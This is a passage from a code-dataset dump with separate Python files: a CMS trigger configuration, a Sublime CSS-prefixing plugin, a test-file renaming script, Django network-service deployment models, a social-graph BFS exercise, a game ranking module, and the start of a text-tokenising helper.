UseL1GlobalTriggerRecord = cms.bool( False ),\n L1GtRecordInputTag = cms.InputTag( \"hltGtDigis\" )\n)\nprocess.hltTrigReport = cms.EDAnalyzer( \"HLTrigReport\",\n HLTriggerResults = cms.InputTag( 'TriggerResults','','HLT' )\n)\nprocess.DQML1Scalers = cms.EDAnalyzer( \"L1Scalers\",\n l1GtData = cms.InputTag( \"hltGtDigis\" ),\n fedRawData = cms.InputTag( \"source\" ),\n HFRecHitCollection = cms.InputTag( \"hltHfreco\" ),\n maskedChannels = cms.untracked.vint32( 8137, 8141, 8147, 8149, 8500 )\n)\nprocess.DQMHLTScalers = cms.EDAnalyzer( \"HLTScalers\",\n triggerResults = cms.InputTag( 'TriggerResults','','HLT' )\n)\nprocess.hltOutputA = cms.OutputModule( \"PoolOutputModule\",\n fileName = cms.untracked.string( \"outputA.root\" ),\n SelectEvents = cms.untracked.PSet( SelectEvents = cms.vstring( 'HLT_EcalActivity1',\n 'HLT_HFActivity1',\n 'HLTriggerFinalPath',\n 'HLTriggerFirstPath' ) ),\n outputCommands = cms.untracked.vstring( 'drop *_hlt*_*_*',\n 'keep FEDRawDataCollection_source_*_*',\n 'keep FEDRawDataCollection_source_*_*',\n 'keep edmTriggerResults_*_*_*',\n 'keep triggerTriggerEvent_*_*_*',\n 'keep *_hltL1GtObjectMap_*_*' ),\n use_compression = cms.untracked.bool( True ),\n compression_level = cms.untracked.int32( 1 ),\n max_event_size = cms.untracked.int32( 7000000 )\n)\nprocess.hltOutputDQM = cms.OutputModule( \"PoolOutputModule\",\n fileName = cms.untracked.string( \"outputDQM.root\" ),\n SelectEvents = cms.untracked.PSet( SelectEvents = cms.vstring( ) ),\n outputCommands = cms.untracked.vstring( 'drop *_hlt*_*_*',\n 'keep FEDRawDataCollection_source_*_*',\n 'keep FEDRawDataCollection_source_*_*',\n 'keep edmTriggerResults_*_*_*',\n 'keep triggerTriggerEvent_*_*_*',\n 'keep triggerTriggerEventWithRefs_*_*_*',\n 'keep *_hltDt4DSegments_*_*',\n 'keep *_hltL1GtObjectMap_*_*' ),\n use_compression = cms.untracked.bool( True ),\n compression_level = cms.untracked.int32( 1 ),\n max_event_size = cms.untracked.int32( 7000000 )\n)\nprocess.hltOutputHLTDQM = cms.OutputModule( \"PoolOutputModule\",\n fileName = cms.untracked.string( \"outputHLTDQM.root\" ),\n SelectEvents = cms.untracked.PSet( SelectEvents = cms.vstring( ) ),\n outputCommands = cms.untracked.vstring( 'drop *_hlt*_*_*',\n 'keep edmTriggerResults_*_*_*',\n 'keep triggerTriggerEvent_*_*_*',\n 'keep triggerTriggerEventWithRefs_*_*_*',\n 'keep *_hltL1NonIsoLargeWindowElectronPixelSeeds_*_*',\n 'keep *_hltL2TauRelaxingIsolationSelector_*_*',\n 'keep *_hltL2TauJets_*_*',\n 'keep *_hltL2MuonCandidates_*_*',\n 'keep *_hltL1extraParticles_*_*',\n 'keep *_hltTowerMakerForMuons_*_*',\n 'keep *_hltL2TauNarrowConeIsolationProducer_*_*',\n 'keep *_hltL2MuonSeeds_*_*',\n 'keep *_hltL1NonIsoRecoEcalCandidate_*_*',\n 'keep *_hltL3Muons_*_*',\n 'keep *_hltL1IsoLargeWindowElectronPixelSeeds_*_*',\n 'keep *_hltL1IsoSiStripElectronPixelSeeds_*_*',\n 'keep *_hltPixelMatchLargeWindowElectronsL1Iso_*_*',\n 'keep *_hltL1IsoStartUpElectronPixelSeeds_*_*',\n 'keep *_hltIterativeCone5CaloJets_*_*',\n 'keep *_hltL2Muons_*_*',\n 'keep *_hltL1IsoRecoEcalCandidate_*_*',\n 'keep *_hltL1IsolatedElectronHcalIsol_*_*',\n 'keep *_hltL3TrajectorySeed_*_*',\n 'keep *_hltOfflineBeamSpot_*_*',\n 'keep *_hltMet_*_*',\n 'keep *_hltL1NonIsolatedElectronHcalIsol_*_*',\n 'keep *_hltL1NonIsoStartUpElectronPixelSeeds_*_*',\n 'keep *_hltL2MuonIsolations_*_*',\n 'keep *_hltPixelMatchLargeWindowElectronsL1NonIso_*_*',\n 'keep *_hltL1NonIsoSiStripElectronPixelSeeds_*_*',\n 'keep *_hltL3MuonIsolations_*_*',\n 'keep *_hltL3MuonCandidates_*_*' ),\n use_compression = 
cms.untracked.bool( True ),\n compression_level = cms.untracked.int32( 1 ),\n max_event_size = cms.untracked.int32( 7000000 )\n)\nprocess.hltOutputCalibration = cms.OutputModule( \"PoolOutputModule\",\n fileName = cms.untracked.string( \"outputCalibration.root\" ),\n SelectEvents = cms.untracked.PSet( SelectEvents = cms.vstring( ) ),\n outputCommands = cms.untracked.vstring( 'drop *_hlt*_*_*',\n 'keep FEDRawDataCollection_source_*_*',\n 'keep FEDRawDataCollection_source_*_*',\n 'keep edmTriggerResults_*_*_*',\n 'keep triggerTriggerEvent_*_*_*' ),\n use_compression = cms.untracked.bool( True ),\n compression_level = cms.untracked.int32( 1 ),\n max_event_size = cms.untracked.int32( 7000000 )\n)\nprocess.hltOutputEcalCalibration = cms.OutputModule( \"PoolOutputModule\",\n fileName = cms.untracked.string( \"outputEcalCalibration.root\" ),\n SelectEvents = cms.untracked.PSet( SelectEvents = cms.vstring( ) ),\n outputCommands = cms.untracked.vstring( 'drop *_hlt*_*_*',\n 'keep edmTriggerResults_*_*_*',\n 'keep triggerTriggerEvent_*_*_*',\n 'keep *_hltEcalCalibrationRaw_*_*' ),\n use_compression = cms.untracked.bool( True ),\n compression_level = cms.untracked.int32( 1 ),\n max_event_size = cms.untracked.int32( 7000000 )\n)\nprocess.hltOutputALCAPHISYM = cms.OutputModule( \"PoolOutputModule\",\n fileName = cms.untracked.string( \"outputALCAPHISYM.root\" ),\n SelectEvents = cms.untracked.PSet( SelectEvents = cms.vstring( ) ),\n outputCommands = cms.untracked.vstring( 'drop *',\n 'keep edmTriggerResults_*_*_*',\n 'keep triggerTriggerEvent_*_*_*',\n 'keep *_hltAlCaPhiSymStream_*_*',\n 'keep *_hltGtDigis_*_*' ),\n use_compression = cms.untracked.bool( True ),\n compression_level = cms.untracked.int32( 1 ),\n max_event_size = cms.untracked.int32( 7000000 )\n)\nprocess.hltOutputALCAPHISYMHCAL = cms.OutputModule( \"PoolOutputModule\",\n fileName = cms.untracked.string( \"outputALCAPHISYMHCAL.root\" ),\n SelectEvents = cms.untracked.PSet( SelectEvents = cms.vstring( ) ),\n outputCommands = cms.untracked.vstring( 'drop *',\n 'keep edmTriggerResults_*_*_*',\n 'keep triggerTriggerEvent_*_*_*',\n 'keep *_hltL1extraParticles_*_*',\n 'keep *_hltGctDigis_*_*',\n 'keep *_hltAlCaHcalFEDSelector_*_*',\n 'keep *_hltGtDigis_*_*',\n 'keep *_hltL1GtObjectMap_*_*' ),\n use_compression = cms.untracked.bool( True ),\n compression_level = cms.untracked.int32( 1 ),\n max_event_size = cms.untracked.int32( 7000000 )\n)\nprocess.hltOutputALCAP0 = cms.OutputModule( \"PoolOutputModule\",\n fileName = cms.untracked.string( \"outputALCAP0.root\" ),\n SelectEvents = cms.untracked.PSet( SelectEvents = cms.vstring( ) ),\n outputCommands = cms.untracked.vstring( 'drop *',\n 'keep edmTriggerResults_*_*_*',\n 'keep triggerTriggerEvent_*_*_*',\n 'keep *_hltAlCaEtaRegRecHitsCosmics_*_*',\n 'keep *_hltAlCaPi0RegRecHitsCosmics_*_*',\n 'keep *_hltAlCaPi0RegRecHits_*_*',\n 'keep *_hltAlCaEtaRegRecHits_*_*' ),\n use_compression = cms.untracked.bool( True ),\n compression_level = cms.untracked.int32( 1 ),\n max_event_size = cms.untracked.int32( 7000000 )\n)\nprocess.hltOutputRPCMON = cms.OutputModule( \"PoolOutputModule\",\n fileName = cms.untracked.string( \"outputRPCMON.root\" ),\n SelectEvents = cms.untracked.PSet( SelectEvents = cms.vstring( ) ),\n outputCommands = cms.untracked.vstring( 'drop *',\n 'keep edmTriggerResults_*_*_*',\n 'keep *_hltRpcRecHits_*_*',\n 'keep *_hltMuonDTDigis_*_*',\n 'keep *_hltCscSegments_*_*',\n 'keep *_hltDt4DSegments_*_*',\n 'keep L1MuGMTCands_hltGtDigis_*_*',\n 'keep 
L1MuGMTReadoutCollection_hltGtDigis_*_*',\n 'keep *_hltMuonRPCDigis_*_*' ),\n use_compression = cms.untracked.bool( True ),\n compression_level = cms.untracked.int32( 1 ),\n max_event_size = cms.untracked.int32( 7000000 )\n)\nprocess.hltOutputFEDErrors = cms.OutputModule( \"PoolOutputModule\",\n fileName = cms.untracked.string( \"outputFEDErrors.root\" ),\n SelectEvents = cms.untracked.PSet( SelectEvents = cms.vstring( ) ),\n outputCommands = cms.untracked.vstring( 'drop *_hlt*_*_*',\n 'keep FEDRawDataCollection_source_*_*',\n 'keep edmTriggerResults_*_*_*' )\n)\n\nprocess.HLTBeginSequence = cms.Sequence( process.hltTriggerType + process.hltEventNumber + process.hltGtDigis + process.hltGctDigis + process.hltL1GtObjectMap + process.hltL1extraParticles + process.hltOfflineBeamSpot )\nprocess.HLTDoLocalHcalSequence = cms.Sequence( process.hltHcalDigis + process.hltHbhereco + process.hltHfreco + process.hltHoreco )\nprocess.HLTDoCaloSequence = cms.Sequence( process.hltEcalRawToRecHitFacility + process.hltEcalRegionalRestFEDs + process.hltEcalRecHitAll + process.HLTDoLocalHcalSequence + process.hltTowerMakerForAll )\nprocess.HLTEndSequence = cms.Sequence( process.hltBoolEnd )\n\nprocess.HLTriggerFirstPath = cms.Path( process.hltGetRaw + process.HLTBeginSequence + process.hltPreFirstPath + process.hltBoolFirstPath )\n#process.HLT_EcalActivity1 = cms.Path( process.HLTBeginSequence + process.HLTDoCaloSequence + process.hltTowerMakerForEcal + process.hltTowerCandidateMakerForEcal + process.hltHI1jet35U + process.HLTEndSequence )\nprocess.HLT_HFActivity1 = cms.Path( process.HLTBeginSequence + process.hltHcalDigis + process.hltHfreco + process.HLTHcalSimpleRecHitFilter + process.HLTEndSequence )\nprocess.HLTriggerFinalPath = cms.Path( process.hltTriggerSummaryAOD + process.hltPreTriggerSummaryRAW + process.hltTriggerSummaryRAW + process.hltBoolFinalPath )\nprocess.HLTAnalyzerEndpath = cms.EndPath( process.hltL1GtTrigReport + process.hltTrigReport )\n#process.HLTOutput = cms.EndPath( process.DQML1Scalers + process.DQMHLTScalers + process.hltOutputA + process.hltOutputDQM + process.hltOutputHLTDQM )\n#process.AlCaOutput = cms.EndPath( process.hltOutputCalibration + process.hltOutputEcalCalibration + process.hltOutputALCAPHISYM + process.hltOutputALCAPHISYMHCAL + process.hltOutputALCAP0 + process.hltOutputRPCMON + process.hltOutputFEDErrors )\n\nprocess.setName_('HLTTest')\n\nprocess.maxEvents = cms.untracked.PSet(\n input = cms.untracked.int32( 100 )\n)\nprocess.options = cms.untracked.PSet(\n wantSummary = cms.untracked.bool( True )\n)\n\nprocess.GlobalTag.connect = 'frontier://FrontierProd/CMS_COND_31X_GLOBALTAG'\nprocess.GlobalTag.globaltag = 'MC_31X_V9::All'\n\n\n# Automatic addition of the customisation function\ndef customise(process):\n\n process.hltTrigReport.HLTriggerResults = cms.InputTag( 'TriggerResults','',process.name_() )\n\n process.options.wantSummary = cms.untracked.bool(True)\n process.MessageLogger.categories.append('TriggerSummaryProducerAOD')\n process.MessageLogger.categories.append('L1GtTrigReport')\n process.MessageLogger.categories.append('HLTrigReport')\n\n return(process)\n\n\n# End of customisation function definition\n\nprocess = customise(process)\n","sub_path":"pp/HLT/sw/HLTriger/special/test/OnLine_HLT_Test.py","file_name":"OnLine_HLT_Test.py","file_ext":"py","file_size_in_byte":85006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"451440699","text":"import sublime\nimport sublime_plugin\nimport urllib\nimport 
urllib.request\nimport urllib.parse\nimport urllib.error\nimport threading\n\n\nclass PrefixrCommand(sublime_plugin.TextCommand):\n    def run(self, edit):\n        # We check for braces since we can do a better job of preserving\n        # whitespace when braces are not present\n        braces = False\n        sels = self.view.sel()\n        for sel in sels:\n            if self.view.substr(sel).find('{') != -1:\n                braces = True\n\n        # Expand selection to braces, unfortunately this can't use the\n        # built in move_to brackets since that matches parentheses also\n        if not braces:\n            new_sels = []\n            for sel in sels:\n                new_sels.append(self.view.find('\\}', sel.end()))\n            sels.clear()\n            for sel in new_sels:\n                sels.add(sel)\n            self.view.run_command(\"expand_selection\", {\"to\": \"brackets\"})\n\n        # We start one thread per selection so we don't lock up the interface\n        # while waiting for the response from the API\n        threads = []\n        for sel in sels:\n            string = self.view.substr(sel)\n            thread = PrefixrApiCall(sel, string, 5)\n            threads.append(thread)\n            thread.start()\n\n        # We clear all selection because we are going to manually set them\n        self.view.sel().clear()\n\n        # The edit object passed into run() already groups these changes into\n        # a single undo step; view.begin_edit() no longer exists in Sublime Text 3\n        self.handle_threads(edit, threads, braces)\n\n\nclass PrefixrApiCall(threading.Thread):\n    def __init__(self, sel, string, timeout):\n        self.sel = sel\n        self.original = string\n        self.timeout = timeout\n        self.result = None\n        threading.Thread.__init__(self)\n\n    def run(self):\n        try:\n            # urlencode lives in urllib.parse in Python 3, and urlopen\n            # expects the POST body as bytes\n            data = urllib.parse.urlencode({'css': self.original}).encode('utf-8')\n            request = urllib.request.Request('http://prefixr.com/api/index.php', data,\n                headers={\"User-Agent\": \"Sublime Prefixr\"})\n            http_file = urllib.request.urlopen(request, timeout=self.timeout)\n            self.result = http_file.read()\n            return\n\n        except urllib.error.HTTPError as e:\n            err = '%s: HTTP error %s contacting API' % (__name__, str(e.code))\n        except urllib.error.URLError as e:\n            err = '%s: URL error %s contacting API' % (__name__, str(e.reason))\n\n        sublime.error_message(err)\n        self.result = False","sub_path":"Packages/User/hello_world.py","file_name":"hello_world.py","file_ext":"py","file_size_in_byte":2460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"35475804","text":"import os\n\nsubtask_dict = { \"01\" : \"1\",\n                 \"02\" : \"1\",\n                 \"03\" : \"2\",\n                 \"04\" : \"3\",\n                 \"05\" : \"4\" }\n\ntest_no = 1\n\nfor f in sorted(os.listdir(\"../\")):\n    if f.endswith(\".in\") and f.startswith(\"tinklas.\"):\n        label = f.rsplit(\".\",2)[1]\n\n        old_subtask = label[1]+label[2]\n        new_subtask = subtask_dict[old_subtask]\n        new_test = \"{0:02d}\".format(test_no)\n\n        os.rename(\"../\"+f, \"../network.\"+new_test+\"-\"+new_subtask+\".in\")\n\n        test_no = test_no+1\n","sub_path":"testdata/network/scripts/rename_all.py","file_name":"rename_all.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"113652164","text":"# Django imports\nfrom django.db import models\nfrom django.contrib.postgres.fields import JSONField\nfrom django.conf import settings\n\n# Python imports\nimport json\nimport time\nimport requests\nimport os\nfrom enum import Enum\nfrom pprint import pprint\nimport logging\n\n\n# ONSA imports\nfrom worker.lib import ConfigHandler\nfrom worker.lib.common.render import render\nfrom worker.utils.worker_maps import *\nfrom worker.utils.utils import *\nfrom worker.constants import *\nfrom worker.exceptions import *\n\n\nclass Service(models.Model):\n    
client_name = models.CharField(max_length=50)\n    service_id = models.CharField(max_length=50, primary_key=True)\n    service_type = models.CharField(max_length=50)\n    service_state = models.CharField(max_length=50)\n    parameters = JSONField()\n\n    def __str__(self):\n        return self.service_id\n\n    def deploy(self):\n        tasks = Task.objects.filter(\n            service=self, task_state=INITIAL_TASK_STATE)\n\n        # print(\"Service Id: \", self.service_id)\n        # print(\"Requested Tasks: \", tasks)\n\n        completed_tasks = []\n        failed_tasks = []\n\n        self.service_state = CONFIG_GENERAL_ERROR\n\n        for task in tasks:\n            task.run_task()\n            task.save()\n            if task.task_state not in ERROR_STATES:\n                completed_tasks.append(task)\n            elif task.task_state in ROLLBACK_STATES:\n                task.rollback()\n                task.save()\n                failed_tasks.append(task)\n                # TODO DO FOR completed tasks rollback\n                # for t in completed_tasks:\n                #     t.rollback()\n                #     t.save()\n                break\n            else:\n                self.service_state = task.task_state\n                # do not rollback, since this failed task is not \"rollbackeable\"\n\n        if len(failed_tasks):\n            self.service_state = CONFIG_GENERAL_ERROR\n        elif len(completed_tasks) == len(tasks):\n            self.service_state = CONFIG_OK\n\n        self.save()\n        # Let charles know about service state\n        update_charles_service(self)\n\n\nclass Task(models.Model):\n    service = models.ForeignKey(Service, on_delete=models.CASCADE)\n    task_state = models.CharField(max_length=50, blank=True)\n    op_type = models.CharField(max_length=30)\n    device = JSONField()\n\n    def __str__(self):\n        return self.service.service_id\n\n    def _gen_template_path(self):\n        if VendorMap[self.device['vendor']] == 'transition':\n            template_path = \"templates/\" + VendorMap[self.device['vendor']].lower(\n            ) + \"/\" + self.device['model'].lower() + \"/\" + self.op_type.upper() + \"_L2SERVICE.CONF\"\n        else:\n            if self.service.service_type != \"vpls\":\n                template_path = \"templates/\" + VendorMap[self.device['vendor']].lower() + \"/\" + self.device['model'].lower() + \"/\" + self.op_type.upper() + \\\n                    \"_\" + self.service.service_type.split(\"_\")[1].upper(\n                    ) + self.service.service_type.split(\"_\")[0].upper() + \".CONF\"\n            else:\n                template_path = \"templates/\" + VendorMap[self.device['vendor']].lower() + \"/\" + self.device['model'].lower() + \"/\" + self.op_type.upper() + \\\n                    \"_\" + self.service.service_type.upper() + \".CONF\"\n\n        return template_path\n\n    def run_task(self):\n        dir = os.path.dirname(os.path.abspath(__file__))\n\n        # Generates template path\n        template_path = self._gen_template_path()\n        template_path = os.path.join(dir, template_path)\n        logging.info(template_path)\n\n        # Generates variables path\n        variables_path = \"variables/\" + self.service.service_type.upper() + \".json\"\n        variables_path = os.path.join(dir, variables_path)\n        logging.info(variables_path)\n\n        try:\n            # Set up parameters\n            params = {}\n            params['mgmt_ip'] = self.device['mgmt_ip'].replace('/32', '')\n            params['service_id'] = self.service.service_id\n            params['service_type'] = self.service.service_type\n            params['client_name'] = self.service.client_name\n            params.update(self.service.parameters)\n            params['an_port_description'] = \"ACTIVO_ID_\" + \\\n                str(self.service.parameters['access_port_services'])\n            logging.info(f'params: {params}')\n\n            params = json.loads(render(variables_path, params))\n            logging.info(f'parameters to be used: {params}')\n        except BaseException as e:\n            logging.error(e)\n            print(e)\n            # mark the task as failed so deploy() does not count it as completed\n            self.task_state = CONFIG_GENERAL_ERROR\n            return\n\n        config_handler = getattr(\n            ConfigHandler.ConfigHandler, StrategyMap[VendorMap[self.device['vendor']]])\n        logging.info(\"strategy: \" +\n                     
StrategyMap[VendorMap[self.device['vendor']]])\n\n try:\n status = config_handler(template_path, params)\n self.task_state = status\n except BaseException as e:\n logging.error(e)\n self.task_state = CONFIG_GENERAL_ERROR\n logging.info(f'Config task state: {self.task_state}')\n\n def rollback(self):\n\n dir = os.path.dirname(os.path.abspath(__file__))\n\n if VendorMap[self.device['vendor']] == 'transition':\n template_path = \"templates/\" + VendorMap[self.device['vendor']].lower(\n ) + \"/\" + self.device['model'].lower() + \"/\" + \"DELETE_L2SERVICE.CONF\"\n else:\n if self.service.service_type != \"vpls\":\n template_path = \"templates/\" + VendorMap[self.device['vendor']].lower() + \"/\" + self.device['model'].lower(\n ) + \"/\" + \"DELETE_\" + self.service.service_type.split(\"_\")[1].upper() + self.service.service_type.split(\"_\")[0].upper() + \".CONF\"\n else:\n template_path = \"templates/\" + VendorMap[self.device['vendor']].lower() + \"/\" + self.device['model'].lower(\n ) + \"/\" + \"DELETE_\" + self.service.service_type.upper() + \".CONF\"\n\n template_path = os.path.join(dir, template_path)\n\n variables_path = \"variables/\" + self.service.service_type.upper() + \".json\"\n variables_path = os.path.join(dir, variables_path)\n\n logging.info(template_path)\n logging.info(variables_path)\n\n params = {}\n params['mgmt_ip'] = self.device['mgmt_ip'].replace('/32', '')\n params['service_id'] = self.service.service_id\n params['service_type'] = self.service.service_type\n params['client_name'] = self.service.client_name\n\n params.update(self.service.parameters)\n\n params = json.loads(render(variables_path, params))\n\n config_handler = getattr(\n ConfigHandler.ConfigHandler, StrategyMap[VendorMap[self.device['vendor']]])\n try:\n config_handler(template_path, params)\n self.task_state = CONFIG_ROLLBACK_OK\n except BaseException as e:\n logging.error(e)\n self.task_state = CONFIG_ROLLBACK_ERROR\n logging.debug(f'Rollback state: {self.task_state}')\n","sub_path":"worker/worker/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":7026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"261981240","text":"import random \nfrom util import Queue\nimport time\n\n\nclass User:\n def __init__(self, name):\n self.name = name\n def __repr__(self):\n return self.name\n\nclass SocialGraph:\n def __init__(self):\n self.last_id = 0\n self.users = {}\n self.friendships = {}\n\n def add_friendship(self, user_id, friend_id):\n \"\"\"\n Creates a bi-directional friendship\n \"\"\"\n if user_id == friend_id:\n print(\"WARNING: You cannot be friends with yourself\")\n return False\n elif friend_id in self.friendships[user_id] or user_id in self.friendships[friend_id]:\n print(\"WARNING: Friendship already exists\")\n return False\n else:\n self.friendships[user_id].add(friend_id)\n self.friendships[friend_id].add(user_id)\n return True \n # Same as add vertex\n def add_user(self, name):\n \"\"\"\n Create a new user with a sequential integer ID\n \"\"\"\n self.last_id += 1 # automatically increment the ID to assign the new user\n self.users[self.last_id] = User(name)\n self.friendships[self.last_id] = set()\n\n def populate_graph_linear(self, num_users, avg_friendships):\n \"\"\"\n Takes a number of users and an average number of friendships\n as arguments\n\n Creates that number of users and a randomly distributed friendships\n between those users.\n\n The number of users must be greater than the average number of friendships.\n 
\"\"\"\n # Reset graph\n self.last_id = 0\n self.users = {}\n self.friendships = {}\n # !!!! IMPLEMENT ME\n\n # Add users\n for i in range(num_users):\n self.add_user(f\"User_{i+1}\")\n # Linear time \n # Refactor to be O(n) time \n total_friendships = avg_friendships * num_users // 2\n friendshipsCreated = 0\n collisions = 0\n # Pick a random number 1-n, pick another random number 1-n\n while friendshipsCreated < total_friendships:\n user_id = random.randint(1, self.last_id)\n friend_id= random.randint(1, self.last_id)\n # Create friendship between those 2 ids\n if self.add_friendship(user_id, friend_id):\n friendshipsCreated += 1\n else:\n collisions += 1\n # Until you have friendship count = totalFriendships\n print(f\"COLLISIONS: {collisions}\")\n\n\n # Adding a friendship creates two edges\n # Create friendships\n # Create a list with all possible friendships\n # possible_friendships = []\n # for user_id in self.users:\n # for friends_id in range(user_id+1, self.last_id + 1):\n # possible_friendships.append((user_id, friends_id))\n \n # # Shuffle the list\n # random.shuffle(possible_friendships)\n # # print(\"-------\")\n # # print(possible_friendships)\n # # print(\"----\")\n # # Grad the first total_friendship pairs from the list and create friendships\n # for i in range(num_users * avg_friendships // 2):\n # friendship = possible_friendships[i]\n # # print(f\"This is a friendship - {friendship}\")\n # self.add_friendship(friendship[0], friendship[1])\n\n # average_friends = total_friendships / num_users\n # total_friendships = avg_friendships = num users \n # N = avg_friendships + num_users // 2\n\n def populate_graph_quadratic(self, num_users, avg_friendships):\n \"\"\"\n Takes a number of users and an average number of friendships\n as arguments\n\n Creates that number of users and a randomly distributed friendships\n between those users.\n\n The number of users must be greater than the average number of friendships.\n \"\"\"\n # Reset graph\n self.last_id = 0\n self.users = {}\n self.friendships = {}\n # !!!! IMPLEMENT ME\n\n # Add users\n for i in range(num_users):\n self.add_user(f\"User_{i+1}\")\n\n # Adding a friendship creates two edges\n # Create friendships\n # Create a list with all possible friendships\n possible_friendships = []\n for user_id in self.users:\n for friends_id in range(user_id+1, self.last_id + 1):\n possible_friendships.append((user_id, friends_id))\n \n # # Shuffle the list\n random.shuffle(possible_friendships)\n # # print(\"-------\")\n # # print(possible_friendships)\n # # print(\"----\")\n # # Grad the first total_friendship pairs from the list and create friendships\n for i in range(num_users * avg_friendships // 2):\n friendship = possible_friendships[i]\n # print(f\"This is a friendship - {friendship}\")\n self.add_friendship(friendship[0], friendship[1])\n\n # average_friends = total_friendships / num_users\n # total_friendships = avg_friendships = num users \n # N = avg_friendships + num_users // 2\n\n def get_all_social_paths(self, user_id):\n \"\"\"\n Takes a user's user_id as an argument\n\n Returns a dictionary containing every user in that user's\n extended network with the shortest friendship path between them.\n\n The key is the friend's ID and the value is the path.\n \"\"\"\n q = Queue()\n #Return extended network of users \n visited = {} # Note that this is a dictionary, not a set\n # Dictionary will have a key and value pair \n # !!!! 
IMPLEMENT ME\n        q.enqueue([user_id])\n        # For every user_id we need to traverse and find connecting nodes\n        # for each node find the shortest path \n        # counter = 0\n        while q.size() > 0:\n            # counter += 1\n            # print(\"Degree\",counter)\n            path = q.dequeue()\n            # print(path)\n            v = path[-1]\n            if v not in visited:\n                # print(v)\n                visited[v] = path\n                for friend_id in self.friendships[v]:\n                    path_copy = path.copy()\n                    path_copy.append(friend_id)\n                    q.enqueue(path_copy)\n        \n        \n        # set the shortest path as the value in key value \n        # Track visited \n        # If not visited ...\n        #run our bft for shortest path \n\n        return visited\n\n\nif __name__ == '__main__':\n    sg = SocialGraph()\n    num_users = 100\n    avg_friendships = 5\n    start_time = time.time()\n    # Only good if you have sparse graphs not good for dense \n    sg.populate_graph_linear(num_users, avg_friendships)\n    end_time = time.time()\n    print(f\"Linear runtime: {end_time - start_time} seconds\")\n    start_time = time.time()\n    sg.populate_graph_quadratic(num_users, avg_friendships)\n    end_time = time.time()\n    print(f\"Quadratic runtime: {end_time - start_time} seconds\")\n    # print(f\"Users - {sg.users}\")\n    # print(f\"Friendships - {sg.friendships}\")\n    # print(sg.get_all_social_paths(1))\n    # connections = sg.get_all_social_paths(1)\n    # print(connections)\n","sub_path":"projects/social/social.py","file_name":"social.py","file_ext":"py","file_size_in_byte":7185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"538525066","text":"#-*-coding:utf-8-*-\r\nimport rank.object\r\nfrom props.defines import *\r\n\r\n\r\ngdSubNoMapEquipPos = {\r\n\t401:EQUIP_WEAPON,\t# weapon\r\n\t402:EQUIP_CLOTHES,\t# clothes\r\n\t403:EQUIP_HEAD,\t\t# hat\r\n\t404:EQUIP_NECKLACE,\t# accessory\r\n\t405:EQUIP_BELT,\t\t# belt\r\n\t406:EQUIP_SHOES,\t# shoes\r\n}\r\nclass cRanking(rank.object.cRanking):\r\n\t'''Character equipment ranking\r\n\t'''\r\n\tdef title3(self, iUid):#override\r\n\t\t'''Equipment name\r\n\t\t'''\r\n\t\tidx = self.getRoleArgs(iUid).get(\"idx\", 0)\r\n\t\treturn equipData.getConfig(idx, \"名称\", \"\")\r\n\r\n\tdef addRank(self, who):#override\r\n\t\tiWearPos = gdSubNoMapEquipPos.get(self.iRankNo, 0)\r\n\t\toWearEquip = who.equipCtn.getEquipByWearPos(iWearPos)\r\n\t\tif not oWearEquip:\r\n\t\t\treturn\r\n\t\tself.updateScore(who.id, who.name, oWearEquip.getScore(), who.level, who.school, idx=oWearEquip.idx, id=oWearEquip.id)\r\n\r\n\tdef lookInfo(self, who, other, iUid):#override\r\n\t\tiPropsId = self.getRoleArgs(iUid).get(\"id\", 0)\r\n\t\toWearEquip = other.propsCtn.getItem(iPropsId)\r\n\t\tif not oWearEquip:\r\n\t\t\toWearEquip = other.equipCtn.getItem(iPropsId)\r\n\t\tif not oWearEquip:\r\n\t\t\tmessage.tips(who,\"该装备已经失效\")\r\n\t\t\treturn\r\n\t\twho.endPoint.rpcPropsHyperlink(oWearEquip.getMsg4Item(None,*oWearEquip.MSG_ALL))\r\n\r\n\tdef getMyRankInfo(self, who):#override\r\n\t\t'''My rank information\r\n\t\t'''\r\n\t\tiWearPos = gdSubNoMapEquipPos.get(self.iRankNo, 0)\r\n\t\toWearEquip = who.equipCtn.getEquipByWearPos(iWearPos)\r\n\t\tif not oWearEquip:\r\n\t\t\treturn []\r\n\r\n\t\ttMyInfo = []\r\n\t\ttMyInfo.append(self.getRank(who.id))\r\n\t\ttMyInfo.append(who.name)\r\n\t\ttMyInfo.append(oWearEquip.name)\r\n\t\ttMyInfo.append(oWearEquip.getScore())\r\n\t\treturn tMyInfo\r\n\r\n\r\n\r\nimport equipData\r\nimport rank_pb2\r\nimport props.equip\r\nimport 
message\r\n\r\n","sub_path":"logic/rank/equipScore.py","file_name":"equipScore.py","file_ext":"py","file_size_in_byte":1670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"516882485","text":"# Structurally Constrained Recurrent Network (SCRN) Model\n#\n# This gives an implementation of the SCRN model given in Mikolov et al. 2015, arXiv:1412.7753 [cs.NE], \n# https://arxiv.org/abs/1412.7753 using Python and Tensorflow.\n#\n# This model is superseded by the Delta-RNN model given in Ororbia et al. 2017, arXiv:1703.08864 [cs.CL], \n# https://arxiv.org/abs/1703.08864 implemented in this repository using Python and Tensorflow.\n#\n# Functions to translate between text elements (raw data) and tokens (data fed into the models) for the LSTM, SCRN, \n# and SRN models.\n#\n# Stuart Hagler, 2017\n\n# usecase_flg = 1 for predicting letters\n#               2 for predicting words with cutoff for infrequent words\n\n# Imports\nimport collections\nimport string\nimport numpy as np\n\n# Generate dictionary of tokens for text elements and convert text to tokens\ndef text_elements_to_tokens(usecase_flg, text_elements, word_frequency_cutoff):\n    dictionary = dict()\n    if usecase_flg == 1:\n        vocabulary_size = len(string.ascii_lowercase) + 2\n        letters = ['UNK']\n        letters += [' ']\n        for letter in string.ascii_lowercase:\n            letters += [letter]\n        for letter in letters:\n            dictionary[letter] = len(dictionary)\n        vocab_size = vocabulary_size\n    elif usecase_flg == 2:\n        words = [['UNK', -1]]\n        words.extend(collections.Counter(text_elements).most_common(len(text_elements)))\n        frequencies = [i[1] for i in words]\n        cutoff = word_frequency_cutoff\n        while cutoff > 0:\n            if cutoff in frequencies:\n                idx = frequencies.index(cutoff)\n            